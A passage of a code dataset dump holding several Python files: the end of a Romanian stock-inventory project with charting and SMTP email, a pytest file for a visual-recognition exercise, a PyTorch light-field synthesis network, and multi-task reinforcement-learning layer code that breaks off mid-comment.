<= data_sfarsit:\r\n self.temp_lista_d.append(q[1])\r\n lista_date_unice = sorted(set(self.temp_lista_d))\r\n for data in lista_date_unice:\r\n for i in self.d.keys():\r\n if self.d[i] == data:\r\n lista_chei_data.append(i)\r\n for cheie in lista_chei_data:\r\n if cheie in self.i.keys():\r\n lista_temp_i.append(self.i[cheie])\r\n elif cheie in self.e.keys():\r\n lista_temp_e.append(self.e[cheie])\r\n self.dictionar_iesiri.update({data: lista_temp_e})\r\n self.dictionar_intrari.update({data: lista_temp_i})\r\n lista_chei_data = []\r\n lista_temp_i = []\r\n lista_temp_e = []\r\n chart = pygal.StackedBar()\r\n chart.x_labels = lista_date_unice\r\n lista1 = []\r\n lista2 = []\r\n suma = 0\r\n for element in chart.x_labels:\r\n if len(self.dictionar_intrari[element]) == 1:\r\n for item in self.dictionar_intrari[element]:\r\n lista1.append(item)\r\n elif not len(self.dictionar_intrari[element]):\r\n lista1.append(0)\r\n else:\r\n for item in self.dictionar_intrari[element]:\r\n suma += item\r\n lista1.append(suma)\r\n suma = 0\r\n for element in chart.x_labels:\r\n if len(self.dictionar_iesiri[element]) == 1:\r\n for item in self.dictionar_iesiri[element]:\r\n lista2.append(item)\r\n elif not len(self.dictionar_iesiri[element]):\r\n lista2.append(0)\r\n else:\r\n for item in self.dictionar_iesiri[element]:\r\n suma += item\r\n lista2.append(suma)\r\n chart.add('Intrari',lista1)\r\n chart.add('Iesiri',lista2)\r\n chart.render_to_file('Grafic intrari si iesiri '+ str(data_start) + ' ' + str(data_sfarsit) + '.svg')\r\n\r\n def email(self):\r\n sender = input('Va rog introduceti adresa dvs de gmail:\\n')\r\n passw = input('Va rog introduceti parola dvs de gmail:\\n')\r\n receiver = input('Introduceti adresa de e-mail a destinatarului:\\n')\r\n subject = 'Fisa produsului ' + self.prod + ': ' + self.um\r\n self.fisap()\r\n message = 'Subject: {0}\\n\\n{1}'.format(subject, self.f3.read())\r\n\r\n smtp_ob = smtplib.SMTP_SSL('smtp.gmail.com', 465)\r\n smtp_ob.login(user=sender, password=passw)\r\n smtp_ob.sendmail(from_addr=sender, to_addrs=receiver, msg=message)\r\n\r\n# Introducerea de elemente in stoc\r\n\r\nfragute = Stoc('fragute', 'fructe', 'kg') # cream instantele clasei\r\nfragute.intr(100, data='20191001')\r\nfragute.intr(60, data='20191007')\r\nfragute.iesi(111, data='20191105')\r\nfragute.intr(100)\r\nfragute.iesi(73)\r\nfragute.iesi(85)\r\n\r\n\"\"\"1. Implementati o solutie care sa returneze o proiectie grafica a intrarilor si iesirilor intr-o\r\nanumita perioada, pentru un anumit produs;\t--pygal--\"\"\"\r\n\r\nfragute.grafic()\r\n\r\n\"\"\"Exercitiul 2 poate fi testat prin instantiere\"\"\"\r\n\r\n\"\"\"3. Creati o metoda cu ajutorul careia sa puteti transmite prin email diferite informatii(\r\nde exemplu fisa produsului) ; \t--SMTP--\"\"\"\r\n\r\nfragute.email()\r\n\r\n","sub_path":"Info_academy_final_project.py","file_name":"Info_academy_final_project.py","file_ext":"py","file_size_in_byte":8844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"96643954","text":"import pytest\n\n### CBC SOLUTIONS BLOCK\n# do not modify, for CBC internal use only\nimport importlib\nif pytest.config.getoption('solns', default=False):\n vr_func = importlib.import_module(\"vr_func_solns\")\nelse:\n vr_func = importlib.import_module(\"vr_func\")\n### END OF CBC SOLUTIONS BLOCK\n\nimport json\n\ndef read_json_file(file_path):\n \"\"\"Reads and parse a json file.\n\n Parameters\n ----------\n file_path : {str} the path to the json file.\n\n Returns\n -------\n dict : a dictionary containing the json structure read from the file.\n \"\"\"\n with open(file_path) as json_file:\n json_content = json_file.read()\n json_data = json.loads(json_content)\n\n return(json_data)\n\n\ndef test_parse_classes():\n data = read_json_file('pytest_data/classifier_output_1.json')\n\n assert vr_func.parse_classes(data) == {'street','road','yellow color','green color'}, \\\n \"when run on file 'pytest_data/classifier_output_1.json', should return {'street','road','yellow color','green color'}\"\n\n data = read_json_file('pytest_data/classifier_output_empty.json')\n\n assert vr_func.parse_classes(data) == set(), \\\n \"when run on file 'pytest_data/classifier_output_empty.json', should return an empty set\"\n\n\ndef test_measure_accuracy():\n image_list = [\n { 'path':'1.jpg', 'actual':{'dog'}, 'predicted':{'dog'} },\n { 'path':'2.jpg', 'actual':{'dog'}, 'predicted':{'cat'} },\n { 'path':'3.jpg', 'actual':{'cat'}, 'predicted':{'cat'} },\n { 'path':'4.jpg', 'actual':{'cat'}, 'predicted':{'dog'} },\n { 'path':'5.jpg', 'actual':{'dog'}, 'predicted':{'dog'} }\n ]\n assert vr_func.measure_accuracy(image_list) == 0.6, \"when run on course first example, should return 0.6\"\n\n image_list = [\n { 'path':'1.jpg', 'actual':{'a'}, 'predicted':{'a'} },\n { 'path':'2.jpg', 'actual':{'b'}, 'predicted':{'b'} },\n { 'path':'3.jpg', 'actual':{'c'}, 'predicted':{'a'} },\n { 'path':'4.jpg', 'actual':{'a'}, 'predicted':{'a'} },\n { 'path':'5.jpg', 'actual':{'a'}, 'predicted':{'a'} },\n { 'path':'6.jpg', 'actual':{'b'}, 'predicted':{'b'} },\n { 'path':'7.jpg', 'actual':{'c'}, 'predicted':{'a'} },\n { 'path':'8.jpg', 'actual':{'a'}, 'predicted':{'a'} },\n { 'path':'9.jpg', 'actual':{'a'}, 'predicted':{'a'} },\n { 'path':'10.jpg', 'actual':{'b'}, 'predicted':{'b'} }\n ]\n assert vr_func.measure_accuracy(image_list) == 0.8, \"when run on course second example, should return 0.8\"\n","sub_path":"code/visualrecognition/vr_func_test.py","file_name":"vr_func_test.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"106222554","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\nimport torch.nn as nn\nimport pdb\nimport torch\nimport numpy as np\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\n\nclass Net(nn.Module):\n \n def __init__(self, input_shape, minibatch_size, lfsize, \n fFilts = 16, dFilts = 64, sFilts = 128, batchAffine = False):\n super(Net, self).__init__()\n \n # net = Net((height, width), minibatch_size, patch_size, lfsize)\n \n self.input_channels = 3\n self.lfsize = lfsize\n self.dmax = 4\n \n # Matrix P and Q will be passed to the network\n self.P = torch.empty((minibatch_size,) + input_shape).unsqueeze(1)\n self.Q = torch.empty((minibatch_size,) + input_shape).unsqueeze(1)\n \n # Memory to hold multiplier for correct disparity\n # 4 represents four disparity maps\n self.D = torch.empty(minibatch_size,4,1,1,2)\n \n # A divider to normalize the range of disparities using the image size\n self.div = torch.from_numpy(np.array(input_shape[1::-1])[None,None,None,:]/2).float()\n \n # Grid to warp image\n self.grid_w, self.grid_h = np.meshgrid(np.linspace(-1, 1, input_shape[1]),\n np.linspace(-1, 1, input_shape[0]))\n \n self.grid = torch.stack((\n torch.tensor(self.grid_w, dtype=torch.float32), \n torch.tensor(self.grid_h, dtype=torch.float32)),2).unsqueeze(0)\n \n # Converting to cuda tensor if available\n if torch.cuda.is_available():\n self.P = self.P.cuda()\n self.Q = self.Q.cuda()\n self.D = self.D.cuda()\n self.grid = self.grid.cuda()\n self.div = self.div.cuda()\n \n # Making beta learnable parameter\n self.beta = torch.nn.Parameter(torch.tensor(1, dtype=torch.float32))\n self.beta.requires_grad = True\n \n # Features CNN 1\n # (input channels, output channels, kernel size, padding)\n self.f1_conv0 = nn.Conv2d(self.input_channels, fFilts, kernel_size = 3, padding = 1)\n self.f1_conv1 = nn.Conv2d(fFilts, fFilts, kernel_size = 3, padding = 1)\n self.f1_conv2 = nn.Conv2d(fFilts, fFilts, kernel_size = 3, padding = 1)\n self.f1_conv3 = nn.Conv2d(fFilts, fFilts, kernel_size = 3, padding = 1)\n self.f1_conv4 = nn.Conv2d(fFilts, fFilts, kernel_size = 3, padding = 1)\n \n self.f1_pool0 = nn.AvgPool2d(16, stride = 16)\n self.f1_pool1 = nn.AvgPool2d(8, stride = 8)\n \n self.f1_conv5 = nn.Conv2d(fFilts*4, fFilts, kernel_size = 3, padding = 1)\n \n self.f1_bn0 = nn.BatchNorm2d(fFilts, affine=batchAffine)\n self.f1_bn1 = nn.BatchNorm2d(fFilts, affine=batchAffine)\n self.f1_bn2 = nn.BatchNorm2d(fFilts, affine=batchAffine)\n self.f1_bn3 = nn.BatchNorm2d(fFilts, affine=batchAffine)\n self.f1_bn4 = nn.BatchNorm2d(fFilts, affine=batchAffine)\n self.f1_bn5 = nn.BatchNorm2d(fFilts, affine=batchAffine)\n \n # Features CNN 2\n # (input channels, output channels, kernel size, padding)\n self.f2_conv0 = nn.Conv2d(self.input_channels, fFilts, kernel_size = 3, padding = 1)\n self.f2_conv1 = nn.Conv2d(fFilts, fFilts, kernel_size = 3, padding = 1)\n self.f2_conv2 = nn.Conv2d(fFilts, fFilts, kernel_size = 3, padding = 1)\n self.f2_conv3 = nn.Conv2d(fFilts, fFilts, kernel_size = 3, padding = 1)\n self.f2_conv4 = nn.Conv2d(fFilts, fFilts, kernel_size = 3, padding = 1)\n \n self.f2_pool0 = nn.AvgPool2d(16, stride = 16)\n self.f2_pool1 = nn.AvgPool2d(8, stride = 8)\n \n self.f2_conv5 = nn.Conv2d(fFilts*4, fFilts, kernel_size = 3, padding = 1)\n \n self.f2_bn0 = nn.BatchNorm2d(fFilts, affine=batchAffine)\n self.f2_bn1 = nn.BatchNorm2d(fFilts, affine=batchAffine)\n self.f2_bn2 = nn.BatchNorm2d(fFilts, affine=batchAffine)\n self.f2_bn3 = nn.BatchNorm2d(fFilts, affine=batchAffine)\n self.f2_bn4 = nn.BatchNorm2d(fFilts, affine=batchAffine)\n self.f2_bn5 = nn.BatchNorm2d(fFilts, affine=batchAffine)\n \n \n # Disparity CNN 1\n # \n self.d1_conv0 = nn.Conv2d(fFilts*2, dFilts, kernel_size = 3, padding = 2, dilation = 2)\n self.d1_conv1 = nn.Conv2d(dFilts, dFilts, kernel_size = 3, padding = 4, dilation = 4)\n self.d1_conv2 = nn.Conv2d(dFilts, dFilts, kernel_size = 3, padding = 8, dilation = 8)\n self.d1_conv3 = nn.Conv2d(dFilts, dFilts, kernel_size = 3, padding = 16, dilation = 16)\n self.d1_conv4 = nn.Conv2d(dFilts, dFilts//2, kernel_size = 3, padding = 1)\n self.d1_conv5 = nn.Conv2d(dFilts//2, dFilts//2, kernel_size = 3, padding = 1)\n self.d1_conv6 = nn.Conv2d(dFilts//2, 1, kernel_size = 3, padding = 1)\n \n self.d1_bn0 = nn.BatchNorm2d(dFilts, affine=batchAffine)\n self.d1_bn1 = nn.BatchNorm2d(dFilts, affine=batchAffine)\n self.d1_bn2 = nn.BatchNorm2d(dFilts, affine=batchAffine)\n self.d1_bn3 = nn.BatchNorm2d(dFilts, affine=batchAffine)\n self.d1_bn4 = nn.BatchNorm2d(dFilts//2, affine=batchAffine)\n self.d1_bn5 = nn.BatchNorm2d(dFilts//2, affine=batchAffine)\n \n # Disparity CNN 2\n # \n self.d2_conv0 = nn.Conv2d(fFilts*2, dFilts, kernel_size = 3, padding = 2, dilation = 2)\n self.d2_conv1 = nn.Conv2d(dFilts, dFilts, kernel_size = 3, padding = 4, dilation = 4)\n self.d2_conv2 = nn.Conv2d(dFilts, dFilts, kernel_size = 3, padding = 8, dilation = 8)\n self.d2_conv3 = nn.Conv2d(dFilts, dFilts, kernel_size = 3, padding = 16, dilation = 16)\n self.d2_conv4 = nn.Conv2d(dFilts, dFilts//2, kernel_size = 3, padding = 1)\n self.d2_conv5 = nn.Conv2d(dFilts//2, dFilts//2, kernel_size = 3, padding = 1)\n self.d2_conv6 = nn.Conv2d(dFilts//2, 1, kernel_size = 3, padding = 1)\n \n self.d2_bn0 = nn.BatchNorm2d(dFilts, affine=batchAffine)\n self.d2_bn1 = nn.BatchNorm2d(dFilts, affine=batchAffine)\n self.d2_bn2 = nn.BatchNorm2d(dFilts, affine=batchAffine)\n self.d2_bn3 = nn.BatchNorm2d(dFilts, affine=batchAffine)\n self.d2_bn4 = nn.BatchNorm2d(dFilts//2, affine=batchAffine)\n self.d2_bn5 = nn.BatchNorm2d(dFilts//2, affine=batchAffine)\n \n # Selection CNN\n # \n self.s_conv0 = nn.Conv2d(14, sFilts//2, kernel_size = 3, padding = 1) \n self.s_conv1 = nn.Conv2d(sFilts//2, sFilts, kernel_size = 3, padding = 1)\n self.s_conv2 = nn.Conv2d(sFilts, sFilts, kernel_size = 3, padding = 1)\n self.s_conv3 = nn.Conv2d(sFilts, sFilts, kernel_size = 3, padding = 1)\n self.s_conv4 = nn.Conv2d(sFilts, sFilts//2, kernel_size = 3, padding = 1)\n self.s_conv5 = nn.Conv2d(sFilts//2, sFilts//2, kernel_size = 3, padding = 1)\n self.s_conv6 = nn.Conv2d(sFilts//2, sFilts//4, kernel_size = 3, padding = 1)\n self.s_conv7 = nn.Conv2d(sFilts//4, 12, kernel_size = 3, padding = 1)\n \n self.s_bn0 = nn.BatchNorm2d(sFilts//2, affine=batchAffine)\n self.s_bn1 = nn.BatchNorm2d(sFilts, affine=batchAffine)\n self.s_bn2 = nn.BatchNorm2d(sFilts, affine=batchAffine)\n self.s_bn3 = nn.BatchNorm2d(sFilts, affine=batchAffine)\n self.s_bn4 = nn.BatchNorm2d(sFilts//2, affine=batchAffine)\n self.s_bn5 = nn.BatchNorm2d(sFilts//2, affine=batchAffine)\n self.s_bn6 = nn.BatchNorm2d(sFilts//4, affine=batchAffine)\n \n # Features CNN 1\n def f1cnn(self, x):\n \n x = self.f1_bn0(F.elu(self.f1_conv0(x)))\n x = self.f1_bn1(F.elu(self.f1_conv1(x)))\n x = self.f1_bn2(F.elu(self.f1_conv2(x)))\n x_conv2 = x\n x = self.f1_bn3(F.elu(self.f1_conv3(x)))\n x = self.f1_bn4(F.elu(self.f1_conv4(x)))\n x_conv4 = x + x_conv2\n \n x_pool0 = F.upsample(self.f1_pool0(x_conv4), x_conv4.size()[2:4], \n mode='bilinear', align_corners = True)\n x_pool1 = F.upsample(self.f1_pool1(x_conv4), x_conv4.size()[2:4], \n mode='bilinear', align_corners = True)\n \n x = torch.cat((x_conv2, x_conv4, x_pool0, x_pool1), 1)\n \n x = self.f1_bn5(F.elu(self.f1_conv5(x)))\n \n return x\n \n # Features CNN 2\n def f2cnn(self, x):\n \n x = self.f2_bn0(F.elu(self.f2_conv0(x)))\n x = self.f2_bn1(F.elu(self.f2_conv1(x)))\n x = self.f2_bn2(F.elu(self.f2_conv2(x)))\n x_conv2 = x\n x = self.f2_bn3(F.elu(self.f2_conv3(x)))\n x = self.f2_bn4(F.elu(self.f2_conv4(x)))\n x_conv4 = x + x_conv2\n \n x_pool0 = F.upsample(self.f2_pool0(x_conv4), x_conv4.size()[2:4], \n mode='bilinear', align_corners = True)\n x_pool1 = F.upsample(self.f2_pool1(x_conv4), x_conv4.size()[2:4], \n mode='bilinear', align_corners = True)\n \n x = torch.cat((x_conv2, x_conv4, x_pool0, x_pool1), 1)\n \n x = self.f2_bn5(F.elu(self.f2_conv5(x)))\n \n return x\n \n # Disparity CNN 1\n def d1cnn(self, x):\n \n x = self.d1_bn0(F.elu(self.d1_conv0(x)))\n x = self.d1_bn1(F.elu(self.d1_conv1(x)))\n x = self.d1_bn2(F.elu(self.d1_conv2(x)))\n x = self.d1_bn3(F.elu(self.d1_conv3(x)))\n x = self.d1_bn4(F.elu(self.d1_conv4(x)))\n x = self.d1_bn5(F.elu(self.d1_conv5(x)))\n x = torch.tanh(self.d1_conv6(x))\n \n return x.mul(self.dmax)\n \n # Disparity CNN 2\n def d2cnn(self, x):\n \n x = self.d2_bn0(F.elu(self.d2_conv0(x)))\n x = self.d2_bn1(F.elu(self.d2_conv1(x)))\n x = self.d2_bn2(F.elu(self.d2_conv2(x)))\n x = self.d2_bn3(F.elu(self.d2_conv3(x)))\n x = self.d2_bn4(F.elu(self.d2_conv4(x)))\n x = self.d2_bn5(F.elu(self.d2_conv5(x)))\n x = torch.tanh(self.d2_conv6(x))\n \n return x.mul(self.dmax)\n \n # Selection CNN\n def scnn(self, x):\n \n x = self.s_bn0(F.elu(self.s_conv0(x)))\n x = self.s_bn1(F.elu(self.s_conv1(x)))\n x = self.s_bn2(F.elu(self.s_conv2(x)))\n x = self.s_bn3(F.elu(self.s_conv3(x)))\n x = self.s_bn4(F.elu(self.s_conv4(x)))\n x = self.s_bn5(F.elu(self.s_conv5(x)))\n x = self.s_bn6(F.elu(self.s_conv6(x)))\n x = torch.tanh(self.s_conv7(x))\n \n x = F.softmax(self.beta*x,dim = 1)\n \n return x\n\n def forward(self, x, p, q):\n # extract input features\n \n # Top-Left (-3, -3),\n self.D[:,0,:,:,1] = p[:,None,None]*(self.lfsize[2] // 2) + 3\n self.D[:,0,:,:,0] = q[:,None,None]*(self.lfsize[3] // 2) + 3\n \n # Top-right (-3, +3),\n self.D[:,1,:,:,1] = p[:,None,None]*(self.lfsize[2] // 2) + 3\n self.D[:,1,:,:,0] = q[:,None,None]*(self.lfsize[3] // 2) - 3\n \n # Bottom-Left (+3, -3),\n self.D[:,2,:,:,1] = p[:,None,None]*(self.lfsize[2] // 2) - 3\n self.D[:,2,:,:,0] = q[:,None,None]*(self.lfsize[3] // 2) + 3\n \n # Bottom-right (+3, +3),\n self.D[:,3,:,:,1] = p[:,None,None]*(self.lfsize[2] // 2) - 3\n self.D[:,3,:,:,0] = q[:,None,None]*(self.lfsize[3] // 2) - 3\n \n self.P[:,:,:,:] = p[:,None,None,None]\n self.Q[:,:,:,:] = q[:,None,None,None]\n \n # [sample, channels, height, width, corner] \n x_00 = x[:,:3] # 0:3 top-left\n x_01 = x[:,6:9] # 6:9 top-right\n x_10 = x[:,3:6] # 3:6 bottom-left\n x_11 = x[:,9:] # 9:12 bottom-right\n \n # Extracting horizontal and forward diagonal features\n Fh_00 = self.f1cnn(x_00); Ff_00 = self.f2cnn(x_00);\n Fh_01 = self.f1cnn(x_01); Ff_01 = self.f2cnn(x_01);\n Fh_10 = self.f1cnn(x_10); Ff_10 = self.f2cnn(x_10);\n Fh_11 = self.f1cnn(x_11); Ff_11 = self.f2cnn(x_11);\n \n dh_00 = self.d1cnn(torch.cat((Fh_00, Fh_01), 1))\n dh_01 = - self.d1cnn(torch.cat((Fh_01, Fh_00), 1))\n dh_10 = self.d1cnn(torch.cat((Fh_10, Fh_11), 1))\n dh_11 = - self.d1cnn(torch.cat((Fh_11, Fh_10), 1))\n \n df_01 = self.d2cnn(torch.cat((Ff_01, Ff_10), 1))\n df_10 = - self.d2cnn(torch.cat((Ff_10, Ff_01), 1))\n \n # Extracting vertical and backward diagonal features\n Fv_00 = self.f1cnn(x_00.permute(0,1,3,2)); Fb_00 = self.f2cnn(x_00.flip(3));\n Fv_01 = self.f1cnn(x_01.permute(0,1,3,2)); Fb_01 = self.f2cnn(x_01.flip(3));\n Fv_10 = self.f1cnn(x_10.permute(0,1,3,2)); Fb_10 = self.f2cnn(x_10.flip(3));\n Fv_11 = self.f1cnn(x_11.permute(0,1,3,2)); Fb_11 = self.f2cnn(x_11.flip(3));\n \n dv_00 = self.d1cnn(torch.cat((Fv_00, Fv_10), 1)).permute(0,1,3,2)\n dv_10 = - self.d1cnn(torch.cat((Fv_10, Fv_00), 1)).permute(0,1,3,2)\n dv_01 = self.d1cnn(torch.cat((Fv_01, Fv_11), 1)).permute(0,1,3,2)\n dv_11 = - self.d1cnn(torch.cat((Fv_11, Fv_01), 1)).permute(0,1,3,2)\n \n db_00 = self.d2cnn(torch.cat((Fb_00, Fb_11), 1)).flip(3)\n db_11 = - self.d2cnn(torch.cat((Fb_11, Fb_00), 1)).flip(3)\n \n # Calculating 12 disparity maps\n Dh_00 = dh_00[:,0].unsqueeze(3).repeat(1,1,1,2)*self.D[:,0]\n Db_00 = db_00[:,0].unsqueeze(3).repeat(1,1,1,2)*self.D[:,0]\n Dv_00 = dv_00[:,0].unsqueeze(3).repeat(1,1,1,2)*self.D[:,0]\n \n Dh_01 = dh_01[:,0].unsqueeze(3).repeat(1,1,1,2)*self.D[:,1]\n Df_01 = df_01[:,0].unsqueeze(3).repeat(1,1,1,2)*self.D[:,1]\n Dv_01 = dv_01[:,0].unsqueeze(3).repeat(1,1,1,2)*self.D[:,1]\n \n Dh_10 = dh_10[:,0].unsqueeze(3).repeat(1,1,1,2)*self.D[:,2]\n Df_10 = df_10[:,0].unsqueeze(3).repeat(1,1,1,2)*self.D[:,2]\n Dv_10 = dv_10[:,0].unsqueeze(3).repeat(1,1,1,2)*self.D[:,2]\n \n Dh_11 = dh_11[:,0].unsqueeze(3).repeat(1,1,1,2)*self.D[:,3]\n Db_11 = db_11[:,0].unsqueeze(3).repeat(1,1,1,2)*self.D[:,3]\n Dv_11 = dv_11[:,0].unsqueeze(3).repeat(1,1,1,2)*self.D[:,3]\n \n \n \n wh_00 = F.grid_sample(x_00, self.grid + Dh_00/(self.div), align_corners=False)\n wb_00 = F.grid_sample(x_00, self.grid + Db_00/(self.div), align_corners=False)\n wv_00 = F.grid_sample(x_00, self.grid + Dv_00/(self.div), align_corners=False)\n \n wh_01 = F.grid_sample(x_01, self.grid + Dh_01/(self.div), align_corners=False)\n wf_01 = F.grid_sample(x_01, self.grid + Df_01/(self.div), align_corners=False)\n wv_01 = F.grid_sample(x_01, self.grid + Dv_01/(self.div), align_corners=False)\n \n wh_10 = F.grid_sample(x_10, self.grid + Dh_10/(self.div), align_corners=False)\n wf_10 = F.grid_sample(x_10, self.grid + Df_10/(self.div), align_corners=False)\n wv_10 = F.grid_sample(x_10, self.grid + Dv_10/(self.div), align_corners=False)\n \n wh_11 = F.grid_sample(x_11, self.grid + Dh_11/(self.div), align_corners=False)\n wb_11 = F.grid_sample(x_11, self.grid + Db_11/(self.div), align_corners=False)\n wv_11 = F.grid_sample(x_11, self.grid + Dv_11/(self.div), align_corners=False)\n \n \n W = torch.cat((wh_00[:,:,:,:,None], wb_00[:,:,:,:,None], wv_00[:,:,:,:,None],\n wh_01[:,:,:,:,None], wf_01[:,:,:,:,None], wv_01[:,:,:,:,None],\n wh_10[:,:,:,:,None], wf_10[:,:,:,:,None], wv_10[:,:,:,:,None],\n wh_11[:,:,:,:,None], wb_11[:,:,:,:,None], wv_11[:,:,:,:,None]),4)\n W = W.permute(0,4,2,3,1)\n \n M = self.scnn(torch.cat((dh_00/self.dmax, db_00/self.dmax, dv_00/self.dmax,\n dh_01/self.dmax, df_01/self.dmax, dv_01/self.dmax,\n dh_10/self.dmax, df_10/self.dmax, dv_10/self.dmax,\n dh_11/self.dmax, db_11/self.dmax, dv_11/self.dmax, \n self.P, self.Q), 1))\n \n I = torch.sum(M.unsqueeze(4)*W, dim = 1).permute(0, 3, 1, 2)\n \n return I\n\n\ndef get_variable(x):\n \"\"\" Converts tensors to cuda, if available. \"\"\"\n if torch.cuda.is_available():\n return x.cuda()\n return x\n\ndef get_numpy(x):\n \"\"\" Get numpy array for both cuda and not. \"\"\"\n if torch.cuda.is_available():\n return x.cpu().data.numpy()\n return x.data.numpy()\n\n","sub_path":"OAVS-navarro/Networks/UDDE_000.py","file_name":"UDDE_000.py","file_ext":"py","file_size_in_byte":16600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"321646614","text":"import numpy as np\nimport scipy.signal\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.distributions.normal import Normal\n\nclass HashLinear(nn.Linear):\n \"\"\"\n Base Class\n \"\"\"\n def __init__(self, n_in, n_out, bias=True):\n super(HashLinear, self).__init__(n_in, n_out, bias)\n\n def forward(self, x, task_index):\n if self.alpha_mode:\n return self.alpha_forward(x, task_index)\n o = self.o[task_index]\n m = x * o\n r = F.linear(m, self.weight, self.bias)\n return r\n\n def alpha_forward(self, x, alpha):\n o = torch.matmul(self.o, alpha)\n m = torch.matmul(x, o)\n r = F.linear(m, self.weight, self.bias)\n return r\n\nclass OnesHashLinear(HashLinear):\n \"\"\"\n All ones initialization\n \"\"\"\n def __init__(self, n_in, n_out, num_tasks, learn_key=True, alpha_mode=False):\n super(OnesHashLinear, self).__init__(n_in, n_out)\n self.alpha_mode = alpha_mode\n if alpha_mode:\n o = torch.ones((n_in, n_in, num_tasks))\n else:\n o = torch.ones(size=(num_tasks, n_in))\n\n self.o = nn.Parameter(o)\n if not learn_key:\n self.o.requires_grad = False\n\nclass RandHashLinear(HashLinear):\n \"\"\"\n Normal Random Initialization\n \"\"\"\n def __init__(self, n_in, n_out, num_tasks, learn_key=True, alpha_mode=False):\n super(RandHashLinear, self).__init__(n_in, n_out)\n self.alpha_mode = alpha_mode\n if alpha_mode:\n o = torch.randn(size=(n_in, n_in, num_tasks))\n else:\n o = torch.randn(size=(num_tasks, n_in))\n\n self.o = nn.Parameter(o)\n if not learn_key:\n self.o.requires_grad = False\n\nclass BinaryHashLinear(HashLinear):\n \"\"\"\n Random {+1, -1} initialization\n \"\"\"\n def __init__(self, n_in, n_out, num_tasks, learn_key=True, alpha_mode=False):\n super(BinaryHashLinear, self).__init__(n_in, n_out)\n self.alpha_mode = alpha_mode\n if alpha_mode:\n rand_01 = np.random.binomial(p=.5, n=1, size=(n_in, n_in, num_tasks)).astype(np.float32)\n else:\n rand_01 = np.random.binomial(p=.5, n=1, size=(num_tasks, n_in)).astype(np.float32)\n o = torch.from_numpy(rand_01*2 - 1)\n\n self.o = nn.Parameter(o)\n if not learn_key:\n self.o.requires_grad = False\n\nclass SanityCheckLinear(HashLinear):\n \"\"\"\n Just for sanity checking, almost equivalent to independent networks\n \"\"\"\n def __init__(self, n_in, n_out, num_tasks, learn_key=False):\n super(SanityCheckLinear, self).__init__(n_in, n_out)\n o = np.zeros(shape=(num_tasks, n_in))\n mask = np.concatenate((np.ones(int(n_in//num_tasks)), np.zeros(int(n_in - n_in//num_tasks)))).astype(int)\n for task in range(num_tasks):\n o[task] = np.where(mask, 1, 0)\n mask = np.roll(mask, int(n_in//num_tasks))\n o = torch.from_numpy(o).float()\n self.o = nn.Parameter(o)\n self.o.requires_grad = False\n\n#class ProposedContextLinear(nn.Linear):\n# \"\"\"\n# This takes in a context vector proposed by another network\n# \"\"\"\n# def __init__(self, n_in, n_out, num_tasks=None): #numtasks not used\n# super(ProposedContextLinear, self).__init__(n_in, n_out)\n# w = nn.init.xavier_normal_(torch.empty(n_in, n_out))\n# self.w = nn.Parameter(w)\n# self.bias = nn.Parameter(torch.zeros(n_out))\n# self.o = None\n#\n# def forward(self, x, context):\n# m = x * context\n# r = torch.mm(m, self.w) + self.bias\n# return r\n\ndef combined_shape(length, shape=None):\n if shape is None:\n return (length,)\n return (length, shape) if np.isscalar(shape) else (length, *shape)\n\ndef multi_task_combined_shape(outer_dim, length, shape=None):\n if shape is None:\n return (outer_dim, length,)\n return (outer_dim, length, shape) if np.isscalar(shape) else (outer_dim, length, *shape)\n\ndef mlp(sizes, activation, output_activation=nn.Identity):\n layers = []\n for j in range(len(sizes)-1):\n act = activation if j < len(sizes)-2 else output_activation\n layers += [nn.Linear(sizes[j], sizes[j+1]), act()]\n return nn.Sequential(*layers)\n\ndef mlp_psp(sizes, activation, num_tasks, psp_type, output_activation=nn.Identity):\n layers = []\n linear_layer = select_linear_layer(psp_type)\n for j in range(len(sizes)-1):\n act = activation if j < len(sizes)-2 else output_activation\n if j == 0:\n layers += [nn.Linear(sizes[j], sizes[j+1]), act()]\n else:\n layers += [linear_layer(sizes[j], sizes[j+1], num_tasks), act()]\n return nn.ModuleList(layers)\n\ndef count_vars(module):\n return sum([np.prod(p.shape) for p in module.parameters()])\n\ndef select_linear_layer(psp_type: str):\n if psp_type == 'Ones':\n linear_layer = OnesHashLinear\n elif psp_type == 'Rand':\n linear_layer = RandHashLinear\n elif psp_type == 'Binary':\n linear_layer = BinaryHashLinear\n #elif psp_type == 'Proposed':\n # linear_layer = ProposedContextLinear\n elif psp_type == 'Sanity':\n linear_layer = SanityCheckLinear\n return linear_layer\n\n\nLOG_STD_MAX = 2\nLOG_STD_MIN = -20\n\nclass SquashedGaussianMLPActor(nn.Module):\n\n def __init__(self, num_tasks, obs_dim, act_dim, hidden_sizes, activation, act_limit, psp_type):\n super().__init__()\n self.activation = activation\n self.net = mlp_psp([obs_dim] + list(hidden_sizes), activation, num_tasks, psp_type, activation)\n linear_layer = select_linear_layer(psp_type)\n self.mu_layer = linear_layer(hidden_sizes[-1], act_dim, num_tasks)\n self.log_std_layer = linear_layer(hidden_sizes[-1], act_dim, num_tasks)\n self.act_limit = act_limit\n self.num_tasks = num_tasks\n\n def forward(self, obs, deterministic=False, with_logprob=True, context=None):\n which_task = torch.argmax(obs[..., -self.num_tasks:], dim=-1).long()\n net_out = obs[..., :-self.num_tasks]\n layer_counter = 0\n for layer in self.net:\n if not hasattr(layer, \"o\"):\n net_out = layer(net_out)\n elif context is None:\n net_out = layer(net_out, which_task)\n else:\n net_out = layer(net_out, context[layer_counter])\n layer_counter += 1\n if context is None:\n mu = self.mu_layer(net_out, which_task)\n log_std = self.log_std_layer(net_out, which_task)\n else:\n mu = self.mu_layer(net_out, context[-2])\n log_std = self.log_std_layer(net_out, context[-1])\n log_std = torch.clamp(log_std, LOG_STD_MIN, LOG_STD_MAX)\n std = torch.exp(log_std)\n\n # Pre-squash distribution and sample\n pi_distribution = Normal(mu, std)\n if deterministic:\n # Only used for evaluating policy at test time.\n pi_action = mu\n else:\n pi_action = pi_distribution.rsample()\n\n if with_logprob:\n # Compute logprob from Gaussian, and then apply correction for Tanh squashing.\n # NOTE: The correction formula is a little bit magic. To get an understanding \n # of where it comes from, check out the original SAC paper (arXiv 1801.01290) \n # and look in 